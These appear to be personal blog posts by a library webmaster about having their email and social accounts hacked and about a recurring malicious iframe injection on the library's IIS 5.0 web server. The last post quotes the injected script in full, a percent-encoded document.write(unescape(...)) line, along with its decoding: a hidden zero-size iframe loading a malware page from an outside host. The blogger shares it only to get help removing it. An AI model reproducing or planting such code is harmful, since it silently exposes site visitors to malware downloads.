I’ve been hacked. (Updated) (Updated again) (another update)

UPDATE 3: OK I am once again back in my gmail account now for just under 24 hours. I’m still leary of logging in from anywhere BUT my phone (and my parent’s office PC that is brand new and rarely used) and am going to do a clean install of Windows on my computer just to be safe. Microsoft Security Essentials and Malwarebytes Anti-Malware both came up with bupkis on my home and office PC but our Trend Micro enterprise software did find a startling number of viruses on the two computers at our Reference Desk so right now my main suspicion is there (one of which was one of the last computers I used on Wednesday night since I work the evening shift). I haven’t made an attempt to recover my gmail account for this blog but I have posted a new one for the time being. Of course I’m still locked out of facebook which is both a blessing and a curse, plus I reset my phone to factory defaults so I lost all of my contacts. Right now all that’s left is a vague feeling of violation. Needless my review for Chasing the Dragon is a bit delayed. Barring more crises I hope to have it up by Monday afternoon at the latest.

UPDATE 2: So where I thought the problem is my home PC it is entirely possible that it is my work PC since, after updating my password, IT HAPPENED AGAIN while I was at lunch and even reset the password on the yahoo account I JUST MADE. I don’t really want or need this kind of stress. Right now running a virus scan and Malwarebytes Anti-Malware on my desk PC. This is REALLY REALLY lame.

UPDATE 1:  I’m now back in my WAAAAAAAAAY more important personal email account.  The email I used for contact on this blog has “deactivated due to suspicious activity.”   I’ve since put a different email on the “About” page.  My suspicion now is that whatever did this got access to a very very old yahoo account first since there were password reset emails I don’t remember asking about and somehow got in that way.  That account has since been deleted.  But maybe I’m wrong and it happened some other way.  Regardless, it was a might scare, and this is closest I’ve come to wanted a drink so early in the frickin’ the day.  I still don’t have access to my Facebook account but hopefully I’ll have that back sometime later today or tomorrow (something I won’t cry over).

I am not in Cardiff and I have not been mugged.

However, my Google account has been hacked.

I suspect it was a keylogger from a **cough**bittorrent**cough** site.

For those wondering:  THIS IS FUCKING TERRIFYING.

It’s easy to forget just how much of one’s online existence is tied to a single account.

I’m hoping everything can be resolved.  God help me if it can’t.

Advertisements

Malicious Javascript Update

As mentioned previously, we have been plagued as of late by a particularly nasty and resilient bit of iframe hacking.  While our Trend Micro software managed to pick up absolutely nada I discovered that Kaspersky has an online scanner.  Roughly 3 hours and 19 minutes later and voila!  8 infected files and 5 viruses! Not to mention a ridiculous amount of locked files.  Among those 5 viruses is a little sucker named “Trojan-Downloader.HTML.IFrame.bu” which I’m hoping is the tenacious bastard responsible for our little problem.

Malicious javascript: document.write (unescape

Some malicious javascript has been appearing on the website of the library I work at:

document.write(unescape(‘%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%6E%39%36%2E%64%6E%73%2E%67%65%6E%64%69%73%74%72%2E%69%6E%66%6F%2F%71%75%61%6C%69%74%79%74%65%73%74%2F%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E’));

this translates to:

iframe src=”http://mn96.dns.gendistr.info/qualitytest/” height=”0″ width=”0″

The website attempts to offer a virus disguised as ad protection software.  I can delete the code but it reappears (likely if/when the server is rebooted).  The code goes deep enough to appear in the iisstart.asp, localstart.asp, and browser_detect.asp.   Since I’m technically only the webmaster (for a new webpage that isn’t even up yet, don’t ask, I don’t manage the servers or other hardware) with exactly 0 experience with IIS (we have a consultant for that) I’m not sure where to go from here.

We’re running IIS 5.0 and I, for the life of me, can’t figure what item (if any) allows the replication of the code. Any help would be much appreciated.

P.S.:  To make matters worse the wwwroot folder is clogged with sh*ttons of legacy files that no-one needs/uses.